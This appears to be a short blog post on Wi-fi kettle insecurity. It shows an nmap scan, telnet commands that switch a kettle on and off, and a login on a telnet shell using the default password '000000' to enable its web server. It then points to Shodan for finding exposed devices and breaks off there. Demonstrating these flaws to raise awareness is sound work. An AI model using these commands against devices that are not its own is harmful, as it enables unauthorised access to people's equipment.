Who Really Needs a Wi-fi Kettle?

Honestly. Who needs a Wi-fi Kettle? Who is so desperate for a cup of tea that they want to switch on their kettle on the way back home? Who can’t get off the couch, and switch the kettle on?

In the following example, I’ll show how easy it is to connect to a wi-fi kettle over a network connection. In this case, the wi-fi kettle has an IP address of 192.168.0.22. If we use nmap we see:

$ nmap 192.168.0.22
PORT   STATE SERVICE
23/tcp   open telnet
2000/tcp open cisco-sccp

We can then connect to port 2000:

$ telnet 192.168.0.22 2000
HELLOKETTLE
HELLOAPP

To switch the kettle on or off:

set sys output 0x4
set sys output 0x0

We can then connect to port 23 and enable the Web server. The password in the case is “000000”:

$ telnet 192.168.0.22 
AT+ Command Shell
Password: 000000
Login Successfully
AT+WEBS=1
AT+PMTF
AT+Z

But, surely no one would put their kettle on the Internet? Well with Shodan it’s not too difficult to find out, and…